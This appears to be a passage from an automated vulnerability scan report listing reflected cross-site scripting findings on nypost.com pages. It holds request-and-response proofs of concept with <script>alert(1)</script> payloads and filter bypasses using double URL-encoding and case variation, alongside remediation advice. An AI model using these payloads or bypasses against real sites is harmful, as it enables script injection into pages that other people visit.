1.585. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31d9b<script>alert(1)</script>625f880e871 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig31d9b<script>alert(1)</script>625f880e871/WebPortal/nypost/unica/ntpagetag.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig31d9b<script>alert(1)</script>625f880e871/WebPortal/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.586. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93854<script>alert(1)</script>d0e44a05b43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal93854<script>alert(1)</script>d0e44a05b43/nypost/unica/ntpagetag.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal93854<script>alert(1)</script>d0e44a05b43/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.587. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4025a<script>alert(1)</script>122cf0c612a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost4025a<script>alert(1)</script>122cf0c612a/unica/ntpagetag.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost4025a<script>alert(1)</script>122cf0c612a/unica/ntpagetag.js</p>
...[SNIP]...

1.588. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e06a0<script>alert(1)</script>5e15db0c555 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unicae06a0<script>alert(1)</script>5e15db0c555/ntpagetag.js?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unicae06a0<script>alert(1)</script>5e15db0c555/ntpagetag.js</p>
...[SNIP]...

1.589. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5506f<script>alert(1)</script>f1e1b21cf85 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js5506f<script>alert(1)</script>f1e1b21cf85?v=nim20091109 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js5506f<script>alert(1)</script>f1e1b21cf85</p>
...[SNIP]...

1.590. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/unica.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40bf1<script>alert(1)</script>416e286f79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig40bf1<script>alert(1)</script>416e286f79/WebPortal/nypost/unica/unica.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 700
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:47 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig40bf1<script>alert(1)</script>416e286f79/WebPortal/nypost/unica/unica.js</p>
...[SNIP]...

1.591. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/unica.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f927<script>alert(1)</script>97bf6f737c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal1f927<script>alert(1)</script>97bf6f737c4/nypost/unica/unica.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 701
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:49 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal1f927<script>alert(1)</script>97bf6f737c4/nypost/unica/unica.js</p>
...[SNIP]...

1.592. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/unica.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98788<script>alert(1)</script>7422ba7c034 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost98788<script>alert(1)</script>7422ba7c034/unica/unica.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 701
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:52 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost98788<script>alert(1)</script>7422ba7c034/unica/unica.js</p>
...[SNIP]...

1.593. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/unica.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28d46<script>alert(1)</script>192079921c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica28d46<script>alert(1)</script>192079921c/unica.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 700
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica28d46<script>alert(1)</script>192079921c/unica.js</p>
...[SNIP]...

1.594. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/unica.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc4ee<script>alert(1)</script>350effa176c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/unica.jscc4ee<script>alert(1)</script>350effa176c HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 701
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/unica.jscc4ee<script>alert(1)</script>350effa176c</p>
...[SNIP]...

1.595. http://www.nypost.com/t/Andy%20Pettitte%20 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /t/Andy%20Pettitte%20

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ca8e%253c%252fScRiPt%2520%253e4d6e84c151a was submitted in the REST URL parameter 2. This input was echoed as 7ca8e</ScRiPt >4d6e84c151a in the application's response.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /t/Andy%20Pettitte%207ca8e%253c%252fScRiPt%2520%253e4d6e84c151a HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48150
Content-Type: text/html;charset=UTF-8
ETag: 55e942ca-066d-4059-88cf-6d23265cc1b8
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<script type="text/javascript">

var sitezone = 'topic';
var kws = 'Andy Pettitte 7ca8e</ScRiPt >4d6e84c151a';
var kvs = '';
var adexc = '';

</script>
...[SNIP]...

1.596. http://www.nypost.com/t/Andy%20Pettitte%20 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /t/Andy%20Pettitte%20

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67000%2522%253b4f4bf86fb9a was submitted in the REST URL parameter 2. This input was echoed as 67000";4f4bf86fb9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Andy%20Pettitte%2067000%2522%253b4f4bf86fb9a HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48087
Content-Type: text/html;charset=UTF-8
ETag: fa8afd01-4958-4e80-a68c-5ae22f672671
Cache-Control: max-age=888
Date: Tue, 08 Feb 2011 05:45:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
0;return b;}
var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
ni.acct="DM570110G2DA79EN3";//ACCOUNT NUMBER(S)
ni.pn="Andy Pettitte 67000";4f4bf86fb9a";//PAGE NAME(S)
ni.mlc="/topics";//MULTI-LEVEL CONTENT CATEGORY
ni.pndef="index";//DEFAULT PAGE NAME
ni.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
ni.f
...[SNIP]...

1.597. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /t/Charlie%20Sheen

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aedea"%3b5afe9d0d10 was submitted in the REST URL parameter 2. This input was echoed as aedea";5afe9d0d10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /t/Charlie%20Sheenaedea"%3b5afe9d0d10 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48065
Content-Type: text/html;charset=UTF-8
ETag: 2f4f8e87-e36d-4db7-8327-64938314cf56
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
=0;return b;}
var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
ni.acct="DM570110G2DA79EN3";//ACCOUNT NUMBER(S)
ni.pn="Charlie Sheenaedea";5afe9d0d10";//PAGE NAME(S)
ni.mlc="/topics";//MULTI-LEVEL CONTENT CATEGORY
ni.pndef="index";//DEFAULT PAGE NAME
ni.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
ni.f
...[SNIP]...

1.598. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Charlie%20Sheen

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70663%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a458660819 was submitted in the REST URL parameter 2. This input was echoed as 70663</script><script>alert(1)</script>5a458660819 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Charlie%20Sheen70663%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a458660819 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48345
Content-Type: text/html;charset=UTF-8
ETag: 3d1de66b-8cca-40e6-96ec-496c5790bb82
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<script type="text/javascript">

var sitezone = 'topic';
var kws = 'Charlie Sheen70663</script><script>alert(1)</script>5a458660819';
var kvs = '';
var adexc = '';

</script>
...[SNIP]...

1.599. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Charlie%20Sheen

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 347b2%253cscript%253ealert%25281%2529%253c%252fscript%253ec7800b1805a was submitted in the REST URL parameter 2. This input was echoed as 347b2<script>alert(1)</script>c7800b1805a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t/Charlie%20Sheen347b2%253cscript%253ealert%25281%2529%253c%252fscript%253ec7800b1805a HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48264
Content-Type: text/html;charset=UTF-8
ETag: d279812b-b323-4ec1-a2cf-465d0a63e676
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
RIC 3 is used for Blogs. Param 2 = Blogs link.
ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!)
var cv = _hbEvent("cv");
cv.c5= "/t/Charlie Sheen347b2<script>alert(1)</script>c7800b1805a|Charlie Sheen347b2<script>
...[SNIP]...

1.600. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /t/Fred%20Wilpon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a48"-alert(1)-"338cfffb690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /t/Fred%20Wilpon19a48"-alert(1)-"338cfffb690 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 48137
Content-Type: text/html;charset=UTF-8
ETag: 3a4ad428-9150-4127-aa32-3a6a8afd91df
Cache-Control: max-age=900
Date: Tue, 08 Feb 2011 05:45:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
